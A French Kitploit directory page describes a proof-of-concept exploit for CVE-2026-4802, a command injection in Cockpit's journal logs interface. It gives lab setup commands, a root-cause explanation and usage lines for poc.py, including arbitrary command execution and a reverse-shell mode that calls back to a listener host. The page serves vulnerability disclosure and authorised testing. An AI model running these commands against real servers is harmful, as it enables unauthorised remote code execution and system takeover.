Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-4802 — Preuve de concept d'exploitation pour CVE-2026-4802, une vulnérabilité d'injection de commandes dans l'interface des journaux système de Cockpit, permettant l'exécution arbitraire de commandes et des shells inversés. | Kitploit
Outils/GitHubGitHub/hakaioffsec/cve-2026-4802
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et ContrôleRed Teaming
GitHubhakaioffsec/cve-2026-4802

CVE-2026-4802

Preuve de concept d'exploitation pour CVE-2026-4802, une vulnérabilité d'injection de commandes dans l'interface des journaux système de Cockpit, permettant l'exécution arbitraire de commandes et des shells inversés.

Voir le dépôt
41il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-4802 - Exécution de code à distance via injection de commandes dans Cockpit

Une preuve de concept d'exploitation pour CVE-2026-4802, une exécution de code à distance via injection de commandes dans l'interface des journaux système de Cockpit (loadServiceFilters())

Configuration

Construisez et exécutez l'environnement vulnérable :

root@kitploit:~
$ docker build -t cockpit-vuln .
$ docker run --rm -d --privileged -p 9090:9090 cockpit-vuln

Utilisation

root@kitploit:~
# Vérifier si la cible est vulnérable
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode check

# Exécuter des commandes arbitraires
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode exec --cmd "id"

# Shell inversé
$ python3 poc.py --url http://localhost:9090 --user viewer --pass viewer --mode reverse --lhost 10.0.0.1 --lport 4444

Versions vulnérables

  • Cockpit (versions non corrigées avec pkg/systemd/logsJournal.jsx)

Cause racine

La fonction loadServiceFilters() dans pkg/systemd/logsJournal.jsx construit des commandes shell en joignant des tableaux en chaînes avec uniquement un échappement des espaces avant de les transmettre à /bin/bash -ec. Les paramètres contrôlés par l'utilisateur provenant du fragment d'URL de la page des journaux (par exemple --since=) atteignent ce chemin de code sans être assainis, permettant l'injection de métacaractères shell tels que la substitution de commande ($(...)).

Avertissement

Cet outil est destiné uniquement à des fins éducatives et de recherche. Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'auteur n'est pas responsable de toute utilisation abusive ou de tout dommage causé par ce programme.

QuimeraX Intelligence

QuimeraX Intelligence est une plateforme avancée d'EASM et de renseignement sur les cybermenaces spécialisée dans l'identification des vulnérabilités critiques dans les systèmes complexes. La plateforme surveille, détecte et alerte de manière proactive les clients sur les menaces de sécurité, garantissant transparence et réponse rapide aux risques potentiels. Les clients reçoivent des notifications immédiates et des rapports complets si leurs systèmes sont jugés vulnérables, leur permettant de prendre des mesures de protection. en savoir plus

Hakai Security

Hakai Security est une entreprise de cybersécurité fondée par des professionnels de la sécurité, engagée en faveur de l'excellence technique. Nous proposons des solutions de sécurité sur mesure, notamment des tests d'intrusion avancés, des simulations réalistes de Red Team et des pratiques de développement sécurisé pour protéger de manière proactive les actifs de nos clients contre les cybermenaces en constante évolution.

Références

  • https://bugzilla.redhat.com/show_bug.cgi?id=2451155
  • https://access.redhat.com/security/cve/CVE-2026-4802
  • https://www.cve.org/CVERecord?id=CVE-2026-4802
Télécharger l’outil